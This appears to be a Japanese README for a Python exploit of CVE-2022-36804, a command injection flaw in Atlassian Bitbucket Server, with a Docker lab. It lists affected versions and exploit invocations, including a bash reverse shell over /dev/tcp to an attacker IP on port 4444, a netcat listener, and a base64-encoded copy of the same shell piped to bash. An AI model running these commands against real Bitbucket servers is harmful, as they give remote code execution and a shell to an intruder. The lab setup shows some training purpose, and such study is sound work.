
PythonによるCVE-2022-36804のAtlassian Bitbucket Serverにおけるコマンドインジェクションのエクスプロイト。リモートコード実行とリバースシェルを可能にし、カスタマイズ可能なコマンドとDockerラボ環境を備えています。
Atlassian Bitbucket Server および Data Center の複数の API エンドポイントに、重大なコマンドインジェクションの脆弱性が見つかりました。この脆弱性は、バージョン <7.6.17、<7.17.10、<7.21.4、<8.0.3、<8.1.2、<8.2.2、<8.3.1 より前にリリースされたすべてのバージョンの Bitbucket Server および Data Center に影響します。
docker build -t bitbucket .
docker run -it bitbucket
python3 cve-2022-36804.py -u http://172.17.0.2:7990
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo
172.17.0.3 を自分のローカル IP アドレスに置き換えてください。
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "sh -i >& /dev/tcp/172.17.0.2/4444 0>&1"
nc -lvp 4444
https://www.revshells.comペイロード実行エラーが発生した場合、`sh -i >& /dev/tcp/172.17.0.2/4444 0>&1` を base64 に変換してください。
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE3LjAuMi80NDQ0IDA+JjE=' | base64 -d | bash"
練習のために、Windows または Linux マシンに脆弱性のあるバージョンの Bitbucket Server をインストールすることをお勧めします。Docker イメージと比較して、リバースシェルの取得が容易になります。
詳細情報は[こちら](https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/)をご覧ください。
# 参考文献
* https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
* https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/
* https://github.com/walnutsecurity/cve-2022-36804